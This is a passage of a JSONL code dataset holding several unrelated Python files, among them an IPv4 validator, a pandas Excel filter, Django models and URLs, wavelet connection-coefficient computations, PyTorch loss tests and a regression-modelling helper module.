conv.FilePathConvention(path_conv_list)\n\n\n# now define your attributes to fill the templates.\nroot = '/my_root'\nattributes = {'model_id' : 'GERICS-REMO2015',\n 'variable' : 'pr',\n 'domain_id' : 'EUR-11'}\n\n# create filename and path\nfilename = filename_conv.pattern(**attributes)\npath = path_conv.pattern(root, **attributes)\n\n# create combined file convention\nfile_conv = conv.FileConvention(path_conv, filename_conv)\n\n# create full filename with path\nfile = file_conv.pattern(root, **attributes)\n","sub_path":"examples/convention/convention.py","file_name":"convention.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"297650203","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 15 15:16:16 2019\n\n@author: User1\n\"\"\"\n\ninputString = \"10.254.255.0\"\n\ndef isIPv4Address(inputString):\n splitString = inputString.split('.')\n if len(splitString) != 4:\n return False\n for string in splitString:\n if string.isnumeric():\n if int(string) not in range(256):\n return False\n else:\n return False\n return True\n\nprint(isIPv4Address(inputString))","sub_path":"isIPv4Address.py","file_name":"isIPv4Address.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"5542081","text":"#文件需求:读取工作簿中的一组工作表(部分)\n#2,在这组工作表中筛选特定的行(1-2表中销售额大于$1900.0的行)\n#method2 pandas语句\n#!/usr/bin/env python3\n\nimport sys\nimport pandas as pd\n\ninput_file = sys.argv[1]\noutput_file = sys.argv[2]\nmy_sheets = [0,1]\nthreshold = 1900.0\ndata_frame = pd.read_excel(input_file,sheet_name=my_sheets,index_col=None) #sheet_name=None一次性读取所有表\nrow_list = []\nfor worksheet_name,data in data_frame.items():\n row_list.append(data[data['Sale Amount'].astype(float)>threshold])\nfilterd_rows = pd.concat(row_list,axis=0,ignore_index=True)\nwriter = pd.ExcelWriter(output_file)\nfilterd_rows.to_excel(writer,sheet_name='set_of_worksheets',index=False)\nwriter.save()","sub_path":"read_excel_file/pandas_meets_condition_set_of_worksheets.py","file_name":"pandas_meets_condition_set_of_worksheets.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"496345351","text":"#!/usr/bin/python\n\n'''\nCreate a function called make_country, which takes in a country’s name and capital as parameters.\nThen create a dictionary from those parameters, with ‘name’ and ‘capital’ as keys.\nMake the function print out the values of the dictionary to make sure that it works as intended.\n\n'''\n\ndef make_country(name, capital):\n \n countries = {\n 'name': name,\n 'capital': capital\n }\n print(countries.values())\n return countries\n\nif __name__ == '__main__':\n make_country('Ukraine', 'Kyiv')\n","sub_path":"Lesson7/task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"105098185","text":"from django.contrib.auth.models import User\nfrom django.db import models\n\n\nclass UserAvatarModel(models.Model):\n user = models.OneToOneField(User, on_delete=models.CASCADE, related_name='user_avatar')\n avatar = models.ImageField(upload_to='avatars')\n update_date = models.DateField(auto_now=True)\n\n class Meta:\n verbose_name = 'User avatar'\n verbose_name_plural = 'User avatars'\n","sub_path":"server/apps/PlacesRemember/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"127978879","text":"from django.conf.urls import patterns, include, url\n\nfrom dashboard.views import IndexView, CalendarView\n\nurlpatterns = patterns(\"\",\n\turl(r\"^$\", IndexView.as_view(), name=\"dashboard\"),\n\turl(r\"^logout/$\", \"django.contrib.auth.views.logout\",{\"next_page\": \"/\"}, name=\"logout\"),\n\turl(r\"^login/$\", \"django.contrib.auth.views.login\", {\"template_name\": \"dashboard/login.html\"}, name=\"login\"),\n\turl(r\"^calendar/$\", CalendarView.as_view(), name=\"calendar\")\n\n\t)\n","sub_path":"dashboard/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"414071678","text":"\"\"\"\nFalko Giepmans, 05-08-2020\n\nThis is a code to calculate three-term connection coefficients for all(?) finite\nsupported discrete wavelet families on an unbounded interval.\n\nThis is a fix and an elaboration of the code provided by Manuels \n( https://github.com/manuels/db_cc3 ), where three-term connection coefficients\nare calculated for Daubechies wavelets.\n\nMost of this code is based on the equations given in ( Besora, 2004 ), which in\nturn is based on the theory of ( Latto et al, 1992 ). \n\nReferences:\nBesora, J., Galerkin Wavelet Method for Global Waves in 1D, 2004\nGoedecker, S., Wavelets and their application for the solution of partial \n differential equations in physics, 2009\nLatto, A., Resnikoff, H., Tenenbaum, E., The evaluation of connection \n coefficients of compactly supported wavelets, 1992\n\n\"\"\"\n\nimport itertools\nimport warnings\nimport scipy\n\nimport numpy as np\n\nfrom scipy.special import factorial\n\n# =============================================================================\n# \n# =============================================================================\n\ndef moment(a, i, j):\n \"\"\"\n The moment M^j_i for all(?) scaling functions (Goedecker, 2009)\n \n INPUT:\n a : np.array Wavelet filter\n i : int\n j : int\n \n OUTPUT:\n M^j_i : float\n \"\"\"\n N = a.size\n return (i-(int( N/2)-1))**j \n\n\ndef threeterm_connection_coefficients(a, d1, d2, d3):\n \"\"\"\n Calculates the three-term connection coefficients CC^(d1,d2,d3) of a wavelet.\n The three-term connection coefficients (CC) can be directly calculated for \n d1 = 0. When d1 is not 0 integration by parts can be used to calculate the CC \n of a summation of other CCs for which d1 = 0.\n \n INPUT:\n a : np.array Wavelet filter\n d1,d2,d3: int Order of derivative\n \n OUTPUT:\n idx : lambda function Plots (l,m) to correct index of CC\n indices : np.array non-zero (l,m) pairs of the connection coefficients\n CC : np.array non-zero connection coefficients \n \"\"\"\n if d1 == 0:\n idx, indices, CC = fundamental_threeterm_connection_coefficients(a, d2, d3)\n return idx,indices, CC\n else:\n idx1,indices1, CC1 = threeterm_connection_coefficients(a, d1-1, d2+1, d3)\n idx2,indices2, CC2 = threeterm_connection_coefficients(a, d1-1, d2, d3+1)\n assert indices1 == indices2\n return idx1,indices1, -CC1 - CC2\n \n\ndef fundamental_threeterm_connection_coefficients(a, d2, d3):\n \"\"\"\n Calculates the three-term connection coefficients CC^(0,d2,d3) of a wavelet.\n \n INPUT:\n a : np.array Wavelet filter\n d2,d3 : int Order of derivative\n \n OUTPUT:\n idx : lambda function Plots (l,m) to correct index of CC\n indices : np.array non-zero (l,m) pairs of the connection coefficients\n CC : np.array non-zero connection coefficients \n \"\"\"\n N = a.size\n d = d2 + d3\n\n Tindices = list(set((l,m) for l,m in itertools.product(range(-(N-2), (N-2)+1), repeat=2)\n if abs(l-m) < (N-1)))\n\n idx = lambda l,m: Tindices.index((l,m))\n\n\n if np.amax([d2,d3]) >= N/2:\n msg = 'Calculation of connection coefficients for {},{} > g = N/2 is invalid!'.format(d2,d3)\n warnings.warn(msg)\n\n\n \"\"\"\n Eigen-value problem due to the scaling equations (Latto et al, 1992):\n \"\"\"\n T = np.zeros([len(Tindices), len(Tindices)])\n \n for l,m in Tindices:\n for i,j,k in itertools.product(range(N), repeat=3):\n if (2*l+j-i, 2*m+k-i) not in Tindices:\n continue # skip the CC which are zero anyway\n T[idx(l,m), idx(2*l+j-i, 2*m+k-i)] += a[i]*a[j]*a[k]\n\n\n T -= 2**(1-d)*np.eye(len(Tindices)) \n b = np.zeros([len(Tindices)])\n\n\n \"\"\"\n The eigen-value problem above is rank-deficient, so extra equations are \n needed to solve the system. We can use a adaptation of the moment equations\n to obtain d1+d2 extra homogenous equations (Latto et al, 1992).\n \"\"\"\n M = np.zeros([d2, len(Tindices)])\n k = 0 if (d3 % 2) == 1 else 1\n \n for q in range(d2):\n for j in range(-(N-2), (N-2)+1):\n if (j, k) in Tindices:\n M[q, idx(j, k)] += moment(a, j, q)\n A = np.vstack([T,M])\n b = np.hstack([b, np.zeros([d2])])\n\n\n M = np.zeros([d3, len(Tindices)])\n j = 0 if (d2 % 2) == 1 else 1\n \n for q in range(d3):\n for k in range(-(N-2), (N-2)+1):\n if (j, k) in Tindices:\n M[q, idx(j, k)] += moment(a, k, q)\n A = np.vstack([A,M])\n b = np.hstack([b, np.zeros([d3])])\n\n \n \"\"\"\n Since the eigenvector is determined up to a constant, we alse need a \n normalization equation ( Latto et al, 1992):\n \"\"\"\n M = np.zeros([1, len(Tindices)])\n for j,k in itertools.product(range(-(N-2), (N-2)+1), repeat=2):\n if (j, k) in Tindices:\n M[0, idx(j, k)] += moment(a, j, d2)*moment(a, k, d3)\n \n A = np.vstack([A,M])\n b = np.hstack([b, [factorial(d2)*factorial(d3)]])\n\n\n \"\"\"\n A least squares algorithm is used to solve the over-determined system.\n One can also use np.linalg.lstsq with rcond = None. In my experience \n however, np.linalg.lstsq does not always return residuals correctly.\n \"\"\"\n CC, residuals, rank, singular_values = scipy.linalg.lstsq( A,b)\n\n if abs( residuals ) >= 10**-20:\n msg = 'Residue of lstsq algorithm is {:.2e}!'.format(residuals)\n warnings.warn(msg)\n\n return idx, Tindices, CC\n\n","sub_path":"Wavelet/CC3.py","file_name":"CC3.py","file_ext":"py","file_size_in_byte":5608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"629191005","text":"import unittest\n\nimport torch\nimport torch.nn.functional as F\n\nfrom deepclustering.loss import loss\nfrom deepclustering.loss.IID_losses import IIDLoss\nfrom deepclustering.utils import simplex\n\ndevice = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n\n\nclass Test_CrossEntropyLoss2D(unittest.TestCase):\n def setUp(self):\n self.weight = torch.Tensor([1, 2, 3, 4])\n self.loss = loss.CrossEntropyLoss2d\n self.predict = torch.randn(10, 4, 224, 224)\n b, c, h, w = self.predict.shape\n self.label = torch.randint(0, 4, size=(b, h, w))\n\n def test_weight(self):\n self.criterion = self.loss(weight=self.weight)\n loss = self.criterion(self.predict, self.label)\n # assert loss ==1\n\n def test_cuda(self):\n for arg in self.__dict__:\n if isinstance(arg, torch.Tensor):\n arg = arg.to(\"cpu\")\n\n self.weight = self.weight.to(device)\n self.predict = self.predict.to(device)\n self.label = self.label.to(device)\n self.test_weight()\n\n\nclass Test_IIC(unittest.TestCase):\n def setUp(self) -> None:\n self.x1 = F.softmax(torch.randn(1, 10), 1)\n self.x2 = F.softmax(torch.randn(1, 10), 1)\n assert simplex(self.x1)\n assert simplex(self.x2)\n\n def test_iic(self):\n criterion = IIDLoss(lamb=1.0)\n loss = criterion(self.x1, self.x2)\n with self.assertRaises(AssertionError):\n loss = criterion(self.x1, torch.randn(5, 10))\n\n def test_iic2(self):\n criterion = IIDLoss(1.0)\n loss1, _ = criterion(self.x1, self.x1)\n loss2, _ = criterion(self.x2, self.x1)\n loss3, _ = criterion(self.x1, self.x2)\n assert loss2 == loss3\n","sub_path":"test/deepclustering/loss/test_loss.py","file_name":"test_loss.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"19390494","text":"# Basic modules for dataframe manipulation\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn.model_selection import train_test_split, KFold, cross_val_score\nfrom sklearn.base import BaseEstimator, TransformerMixin, RegressorMixin, clone\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.pipeline import Pipeline\nfrom scipy import stats\nfrom scipy.stats import iqr, norm, skew\nfrom scipy.special import boxcox1p\nfrom pandas.api.types import is_string_dtype, is_numeric_dtype, is_categorical_dtype\nimport math\n\n\ndef lower_cols(dataframe):\n\t\"\"\"\n\tFunction used to convert column headings to lower case\n\t\n\tParameters:\n\t\n\tdataframe - just as the parameter name implies, expects dataframe object\n\t\n\t\"\"\"\n\tdataframe.columns = [x.lower() for x in dataframe.columns]\n\n\ndef obj_to_cat(dataframe):\n \"\"\"\n\tFunction used to convert objects(strings) into categories\n\t\n\tParameters:\n\t\n\tdataframe - just as the parameter name implies, expects dataframe object\n\t\n\t\"\"\"\n\n for n, c in dataframe.items():\n if is_string_dtype(c):\n dataframe[n] = c.astype('category').cat.as_ordered()\n return dataframe\n\t\n\n\ndef fill_missing_nums(dataframe): \n \"\"\"\n\t Function used to impute missing numerical values with column's median\n\t\n\t Parameters:\n\t\n\t dataframe - just as the parameter name implies, expects dataframe object\n\t\n \t \"\"\"\n \n for n, c in dataframe.items(): \n if is_numeric_dtype(c):\n if pd.isnull(c).sum() > 0:\n dataframe.loc[:,n] = c.fillna(c.median())\n return dataframe\n\n\ndef fill_missing_cats(dataframe):\n \"\"\"\n Function used to impute missing categorical values with column's mode\n\t\n Parameters:\n\t\n dataframe - just as the parameter name implies, expects dataframe object\n\t\n \"\"\"\n for n, c in dataframe.items():\n if is_categorical_dtype(c):\n if pd.isnull(c).sum() > 0:\n dataframe.loc[:,n] = c.fillna(c.mode()[0])\n return dataframe\n\t\n\n\ndef display_cols(dataframe, type = 'category', num_samples = 7):\n\t\"\"\"\n\tFunction used to display columns of desired data type\n\t\n\tParameters:\n\t\n\tdataframe - just as the parameter name implies, expects dataframe object\n\ttype - data type we are looking for\n\tnum_samples - number of rows to display\n\t\n\t\"\"\"\n\tmask = dataframe.dtypes == type\n\treturn dataframe.loc[:, mask].sample(num_samples)\n\t\n\n\ndef display_nums_stats(dataframe):\n \"\"\"\n Function used to calculate basic statistics of numerical columns.\n\t\n Parameters:\n\t\n dataframe - just as the parameter name implies, expects dataframe object\n\t\n \"\"\"\n\n numericals = []\n for n, c in dataframe.items():\n\t if is_numeric_dtype(c):\n\t\t numericals.append(n)\n return dataframe[numericals].describe()\n\n\n\t\ndef outliers_by_col(dataframe, train_last_idx , multiplier = 1.5, plot_results = True, outliers_dictionary = False):\n\t\"\"\"\n\tFunction used to determine outliers in each column.\n\t\n\tParameters:\n\t\n\tdataframe - just as the parameter name implies, expects dataframe object\n\tmultiplier - value used for calculating Tukey's Interquartile Range. By default we assume that all values lower than Q1 - (1.5 * IQR) or greather than Q3 + (1.5 * IQR) are outliers\n\tplot_results - by default set to True. As a result boxplots for all columns with outliers will be plotted\n\toutliers_dictionary - by default set to False. If True, dictionary with column names as keys and lists of row indexes containing outliers as values will be returned \n\t\n\t\"\"\"\n\t\n\toutliers_dict = {}\n\tfor column in dataframe.columns:\n\t\t\tif is_numeric_dtype(dataframe[column][:train_last_idx]):\n\t\t\t\tiq_range = iqr(dataframe[column][:train_last_idx])\n\t\t\t\tq1 = np.percentile(dataframe[column][:train_last_idx], 25)\n\t\t\t\tq3 = np.percentile(dataframe[column][:train_last_idx], 75)\n\t\t\t\tlower_bound = q1 - (multiplier * iq_range)\n\t\t\t\tupper_bound = q3 + (multiplier * iq_range)\n\t\t\t\tselect_indices = list(np.where((dataframe[column][:train_last_idx] < lower_bound) | (dataframe[column][:train_last_idx] > upper_bound))[0])\n\t\t\t\tif len(select_indices) > 0 :\n\t\t\t\t\toutliers_dict[column] = select_indices\n\n\t\n\tif plot_results == True:\n\t\tplot_categoricals(dataframe[:train_last_idx], outliers_dict.keys(), kind = 'box', figsize = (20,10))\n\t\t\n\tif outliers_dictionary == True:\n\t\treturn outliers_dict\n\n\n\n\t\ndef nominalnums_to_cat(dataframe, unique_values_split = 30, boundary = 10):\n\t\"\"\"\n\tFunction for converting nominal numerical features into categorical variables. \n\t\n\tParameters:\n\t\n\tdataframe -just as the parameter name implies, expects dataframe object\n\tunique_values_split - number of unique values to treat a variable as a categorical one. By default, variable's data type will be changed to 'category' if it has less than 30 unique values\n\tboundary - decision boundary determining which variable names will be returned in list for further check. By default, all variables which take more than 10 unique values will be returned\n\t\n\t\"\"\"\n\tcols_to_verify = []\n\tfor col in dataframe.columns:\n\t\tif is_numeric_dtype(dataframe[col]):\n\t\t\tlength = len(dataframe[col].value_counts())\n\t\t\tif ((length < unique_values_split) and ('area' not in col)):\n\t\t\t\tdataframe[col] = dataframe[col].astype('category')\n\t\t\t\tif (length > boundary):\n\t\t\t\t\tcols_to_verify.append(col)\n\treturn(cols_to_verify)\n\t\n\ndef display_plots(dataframe, columns, kind = 'count', figsize = (20,10)):\n\t\"\"\"\n\tFunction for plotting suspicious categorical columns.\n\n\tParameters:\n\n\tdataframe - just as the parameter name implies, expects dataframe object\n\tcolumns - list of columns or dictionary keys, e.g. list of columns returned by 'nominalnums_to_cat' function\n\tkind - by default set to 'count' to display countplots for given columns. If 'box' will be used as a value then function will display box plots. \n\n\t\"\"\"\n\t\n\tlength = len(columns)\n\tif length <= 6:\n\t\tplt.figure(figsize=figsize)\n\telif length > 6 and length <= 12:\n\t\tplt.figure(figsize = next((x, int(y*2)) for x,y in [figsize]))\n\telif length > 12 and length <= 18:\n\t\tplt.figure(figsize = next((x, int(y*3)) for x,y in [figsize]))\n\telif length > 18 and length <= 24:\n\t\tplt.figure(figsize = next((x, int(y*4)) for x,y in [figsize]))\n\telif length > 24 and length <= 30:\n\t\tplt.figure(figsize = next((x, int(y*5)) for x,y in [figsize]))\t\n\tfor ix, col in enumerate(columns):\n\t\tplt.subplot(np.ceil(length/3), 3, ix+1)\n\t\tif kind == 'count':\n\t\t\tsns.countplot(dataframe[col])\n\t\telif kind == 'box':\n\t\t\tsns.boxplot(dataframe[col])\n\t\telif kind == 'dist':\n\t\t\tsns.distplot(dataframe[col], fit = norm)\n\t\t\t\n\t\t\t\ndef binarize_numericals(dataframe, columns):\n\t\"\"\"\n\tFunction for creating binomial categorical variables from unequally distributed numerical variables, all values equal to 0 will be denoted as 0 and those greater than 0 will be marked as 1. After conversion, all input variables will be dropped from dataframe.\n\n\tParameters:\n\n\tdataframe - just as the parameter name implies, expects dataframe object\n\tcolumns - list of columns or dictionary keys to convert\n\n\t\"\"\"\n\tfor col in columns:\n\t\tdataframe[col+'_bin'] = np.where(dataframe[col] > 0, 1, 0)\n\t\tdataframe[col+'_bin'] = dataframe[col+'_bin'].astype('category')\n\n\tdataframe.drop(labels= columns, axis=1, inplace = True)\n\n\t\t\n\t\t\ndef get_codes(dataframe):\n\t\"\"\"\n\tFunction for converting values of categorical variables into numbers.\n\t\n\tParameters:\n\t\n\tdataframe - just as the parameter name implies, expects dataframe object\n\t\n\t\"\"\"\n\tfor column in dataframe.columns:\n\t\tif is_categorical_dtype(dataframe[column]):\n\t\t\tdataframe[column] = dataframe[column].cat.codes\n\t\t\t\n\ndef rmsle(y, y_pred):\n return np.sqrt(mean_squared_error(y, y_pred))\n\n\ndef rmse(x,y): return math.sqrt(((x-y)**2).mean())\n\n\ndef rmsle_cv(model, trainingset, target, n_folds):\n\t\n rmse= np.sqrt(-cross_val_score(model, trainingset, target, scoring=\"neg_mean_squared_error\", cv = n_folds, n_jobs = -1))\n return(rmse)\n\t\n\ndef print_score(model, trainingset, target, scoring_func = 'rmse', n_folds = None):\n\t\"\"\"\n\tFunction used for checking the accuracy of the regression model.\n\t\n\tParameters:\n\t\n\tmodel -just as the parameter name implies, expects model object\n\ttrainingset - training dataset\n\ttarget - target variable\n\tscoring_func - scoring function to assess the model's performance. By default RMSE will be used\n\t\n\t\"\"\"\n\tif scoring_func == 'rmse':\n\t\tX_train, X_val, y_train, y_val = train_test_split(trainingset, target, test_size = 0.2, random_state = 123, shuffle = True)\n\t\tres = [rmse(model.predict(X_train), y_train), rmse(model.predict(X_val), y_val), model.score(X_train, y_train), model.score(X_val, y_val)]\n\t\tprint('Training RMSE: {0:.3f} | Testing RMSE: {1:.3f} | Training R^2: {2:.3f} | Testing R^2: {3:.3f}'.format(res[0], res[1], res[2], res[3]))\n\t\n\telif scoring_func == 'rmsle':\n\t\tX_train, X_val, y_train, y_val = train_test_split(trainingset, target, test_size = 0.2, random_state = 123, shuffle = True)\n\t\tres = [rmsle(model.predict(X_train), y_train), rmsle(model.predict(X_val), y_val), model.score(X_train, y_train), model.score(X_val, y_val)]\n\t\tprint('Training RMSLE: {0:.3f} | Testing RMSLE: {1:.3f} | Training R^2: {2:.3f} | Testing R^2: {3:.3f}'.format(res[0], res[1], res[2], res[3]))\n\t\t\n\telif scoring_func == 'rmsle_cv':\t\n\t\tif isinstance(trainingset, np.ndarray) & isinstance(target, np.ndarray):\n\t\t\tn_folds = n_folds\n\t\t\tkf = KFold(n_folds, shuffle=True, random_state=123).get_n_splits(trainingset)\n\t\t\tres = rmsle_cv(model, trainingset, target, n_folds )\n\t\t\tmodel = model.fit(trainingset, target)\n\t\t\tprint('Average cross-validated RMSE: {0:.4f} | Standard Deviation of RMSE: {1:.4f} | Training R^2: {2:.3f}'.format(res.mean(), res.std(), model.score(trainingset, target)))\n\t\t\t\n\t\telse:\n\t\t\tn_folds = n_folds\n\t\t\tkf = KFold(n_folds, shuffle=True, random_state=123).get_n_splits(trainingset.values)\n\t\t\tres = rmsle_cv(model, trainingset, target, n_folds )\n\t\t\tmodel = model.fit(trainingset, target)\n\t\t\tprint('Average cross-validated RMSE: {0:.4f} | Standard Deviation of RMSE: {1:.4f} | Training R^2: {2:.3f}'.format(res.mean(), res.std(), model.score(trainingset, target)))\n\t\t\t\n\t\t\n\t\t\n\t\ndef plot_feat_imp(model, dataframe, boundary = 15, best_features = False):\n\n\t\"\"\"\n\tFunction used for plotting the most important features found by model.\n\t\n\tParameters:\n\t\n\tmodel - just as the parameter name implies, expects model object\n\tdataframe - just as the parameter name implies, expects dataframe object\n\tboundary - number of features we would like to plot\n\t\n\t\"\"\"\n\tindices = np.argsort(model.feature_importances_)[::-1][:boundary]\n\tbest_features_list = [col for col in dataframe.columns[indices]]\n\n\tfig = plt.figure(figsize=(9, 12))\n\tp = sns.barplot(y=dataframe.columns[indices][:boundary], x = model.feature_importances_[indices][:boundary], orient='h')\n\tp.set_xlabel(\"Relative importance\",fontsize=12)\n\tp.set_ylabel(\"Features\",fontsize=12)\n\tp.tick_params(labelsize=10)\n\tp.set_title(\"Feature importances\")\n\tfor i, v in enumerate(model.feature_importances_[indices][:boundary]):\n\t\tplt.text(v, i, \"\"+str(np.round(v,3)), color='#e59471', va='center', fontweight='bold')\n\n\tplt.show()\n\t\n\tif best_features == True:\n\n\t\treturn best_features_list\n\t\n\t\ndef drop_best_feats(model, features, X, y, scoring_func):\n\t\"\"\"\n\tFunction used to evaluate the performance of a model without best features. In each iteration model is dropping one of the best features.\n\t\n\tParameters:\n\t\n\tmodel - just as the parameter name implies, expects model object\n\tfeatures - list of features to drop\n\tX - training features vector\n\ty - training target vector\n\tscoring_func - function to be used for evaluation: 'rmse' or 'rmsle' \n\t\n\t\"\"\"\n\tfor feature in features:\n\t\tX_sub = X.drop(feature, axis = 1)\n\t\tX_train, X_val, y_train, y_val = train_test_split(X_sub, y, test_size = 0.2, random_state = 123, shuffle = False)\n\t\tmodel.fit(X_train, y_train)\n\t\tprint('Dropped feature: {} '.format(feature))\n\t\tprint_score(model, X_train, X_val, y_train, y_val, scoring_func = scoring_func)\n\t\tprint('\\n')\n\n\t\t\n\ndef plot_distqq(x, dataframe):\n\t\"\"\"\n\tFunction used to plot distribution of the desired numerical variable with normal distribution overlayed and quantile-quantile plot.\n\t\n\tParameters:\n\t\n\tx - numerical variable to plot\n\tdataframe - just as the name implies, expects dataframe object\n\n\t\n\t\"\"\"\n\n\tsns.distplot(dataframe[x], fit = norm)\n\t# Get the fitted parameters used by the function\n\tmu, sigma = norm.fit(dataframe[x])\n\t\n\t# Now plot the distribution\n\tplt.legend(['Normal distribution ($\\mu=$ {:.2f} and $\\sigma=$ {:.2f} )'.format(mu, sigma)], loc='best')\n\tplt.ylabel('Frequency')\n\tplt.title('{} distribution'.format(x))\n\t\n\t#Get also the QQ-plot\n\tfig = plt.figure()\n\tres = stats.probplot(dataframe[x], plot=plt)\n\tplt.show()\n\t\n\ndef percent_missing(dataframe, ascending = False, quantity = 30):\n\t\"\"\"\n\tFunction used to calculate the percentage of missing data. As a result returns dataframe.\n\t\n\tParameters:\n\t\n\tdataframe - expects dataframe object\n\tascending - whether values should be sorted in ascending or descending order. By default dataframe will be sorted descendingly.\n\tquantity - number of variables to display\n\n\t\n\t\"\"\"\n\tmissing = (dataframe.isnull().sum() / len(dataframe)) * 100\n\tmissing = missing.drop(missing[missing == 0].index).sort_values(ascending = ascending) [:quantity]\n\tmissing = pd.DataFrame({'Missing Ratio' : missing})\n\treturn missing\n\n\t\ndef plot_bar(x, y, xlabel, ylabel, title, figsize = (12, 8)):\n\t\"\"\"\n\tFunction used to display a barplot of desired variables.\n\t\n\tParameters:\n\t\n\tx - feature variable\n\ty - values of desired feature variable\n\tfigsize - plot size. By default width = 12 and height = 8\n\txlabel - just as the name implies, expects label for x-axis\n\tylabel - xlabel - just as the name implies, expects label for y-axis\n\ttitle - xlabel - just as the name implies, expects plot title\n\n\t\n\t\"\"\"\n\n\tf, ax = plt.subplots(figsize = figsize)\n\tplt.xticks(rotation = '90')\n\tsns.barplot(x = x, y = y)\n\tplt.xlabel(xlabel, fontsize = 13)\n\tplt.ylabel(ylabel, fontsize = 13)\n\tplt.title(title, fontsize = 13)\n\t\ndef calculate_skewness(dataframe):\n\t\"\"\"\n\tFunction used to calculate skewness across numerical features. As a result returns dataframe.\n\t\n\tParameters:\n\t\n\tdataframe - just as the name implies, expects dataframe object\n\t\n\t\"\"\"\n\n\tnumeric_feats = dataframe.dtypes[(dataframe.dtypes != \"category\") & (dataframe.dtypes != \"object\")].index\n\t# Check the skew of all numerical features\n\tskewed_feats = dataframe[numeric_feats].apply(lambda x: skew(x.dropna())).sort_values(ascending=False)\n\tskewness = pd.DataFrame({'Skewness' :skewed_feats})\n\treturn skewness\n\t\n\ndef box_cox_transform(dataframe, skewnesses, lamb):\n\t\"\"\"\n\tFunction used to apply box-cox transformation for highly skewed features to make them look more normally distributed.\n\t\n\tParameters:\n\t\n\tdataframe - just as the name implies, expects dataframe object\n\tskewenesses - expects dataframe object with calculated skewnesses. Use output from 'calculate_skeweness' function.\n\tlamb - lambda value to be used with box-cox transformation. Be defalt boxcox1p is used as it is better for smaller x values. Setting lamb = 0 is equivalent to log1p.\n\t\n\t\"\"\"\n\t\n\tskewness = skewnesses[abs(skewnesses) > 0.75]\n\tskewed_features = skewness.index\n\tlamb = lamb \n\tfor feature in skewed_features:\n\t\tdataframe[feature] = boxcox1p(dataframe[feature], lamb)\n\t\t\n\nclass AveragedScorer(BaseEstimator, RegressorMixin, TransformerMixin):\n def __init__(self, models):\n self.models = models\n \n # we define clones of the original models to fit the data in\n def fit(self, X, y):\n self.models_ = [clone(x) for x in self.models]\n \n # Train cloned base models\n for model in self.models_:\n model.fit(X, y)\n\n return self\n \n #Now we do the predictions for cloned models and average them\n def predict(self, X):\n predictions = np.column_stack([\n model.predict(X) for model in self.models_\n ])\n return np.mean(predictions, axis=1) \n\t\t\n\t\t\nclass StackedAveragedScorer(BaseEstimator, RegressorMixin, TransformerMixin):\n def __init__(self, base_models, meta_model, n_folds=5):\n self.base_models = base_models\n self.meta_model = meta_model\n self.n_folds = n_folds\n \n # We again fit the data on clones of the original models\n def fit(self, X, y):\n self.base_models_ = [list() for x in self.base_models]\n self.meta_model_ = clone(self.meta_model)\n kfold = KFold(n_splits=self.n_folds, shuffle=True, random_state=123)\n \n # Train cloned base models then create out-of-fold predictions\n # that are needed to train the cloned meta-model\n out_of_fold_predictions = np.zeros((X.shape[0], len(self.base_models)))\n for i, model in enumerate(self.base_models):\n for train_index, holdout_index in kfold.split(X, y):\n instance = clone(model)\n self.base_models_[i].append(instance)\n instance.fit(X[train_index], y[train_index])\n y_pred = instance.predict(X[holdout_index])\n out_of_fold_predictions[holdout_index, i] = y_pred\n \n # Now train the cloned meta-model using the out-of-fold predictions as new feature\n self.meta_model_.fit(out_of_fold_predictions, y)\n return self\n \n #Do the predictions of all base models on the test data and use the averaged predictions as \n #meta-features for the final prediction which is done by the meta-model\n def predict(self, X):\n meta_features = np.column_stack([\n np.column_stack([model.predict(X) for model in base_models]).mean(axis=1)\n for base_models in self.base_models_ ])\n return self.meta_model_.predict(meta_features)\n\t\t\n\t\t\ndef reg_importances(model, dataframe, boundary = None, plot = False, figsize = (9, 24), step_name = None):\n\t\n\t\n\t\"\"\"\n\tFunction used for plotting the most important features found by regression model.\n\t\n\tParameters:\n\t\n\tmodel - trained model \n\tdataframe - just as the parameter name implies, expects dataframe object\n\tboundary - number of features we would like to return/plot. By default all features with absolute value > 0 will be returned\n\tplot - whether to plot feature importances or not. By default \"False\"\n\tfigsize - just as the parameter name implies, enables customizing plot size. By default width = 9 and height = 24\n\tstep_name - argument required if model was used in Pipeline object hence is of Pipeline type and expects exact step name to retrieve coefficients\n\t\n\t\"\"\"\n\n\t\n\t\n\tif isinstance(model, Pipeline):\n\t\tcoefs_pos = [coef for coef in model.named_steps[step_name].coef_ if coef > 0]\n\t\tcoefs_neg = [coef for coef in model.named_steps[step_name].coef_ if coef < 0]\n\t\t\n\t\tif boundary == None:\n\t\t\tpos_imps = pd.DataFrame({'Importance': coefs_pos }, index = dataframe.columns[model.named_steps[step_name].coef_ > 0]).sort_values('Importance', ascending = False)\n\t\t\tneg_imps = pd.DataFrame({'Importance': coefs_neg }, index = dataframe.columns[model.named_steps[step_name].coef_ < 0]).sort_values('Importance', ascending = True)\n\t\telse:\n\t\t\tpos_imps = pd.DataFrame({'Importance': coefs_pos }, index = dataframe.columns[model.named_steps[step_name].coef_ > 0]).sort_values('Importance', ascending = False)[:boundary]\n\t\t\tneg_imps = pd.DataFrame({'Importance': coefs_neg }, index = dataframe.columns[model.named_steps[step_name].coef_ < 0]).sort_values('Importance', ascending = True)[:boundary]\n\t\t\t\n\telse:\n\t\tcoefs_pos = [coef for coef in 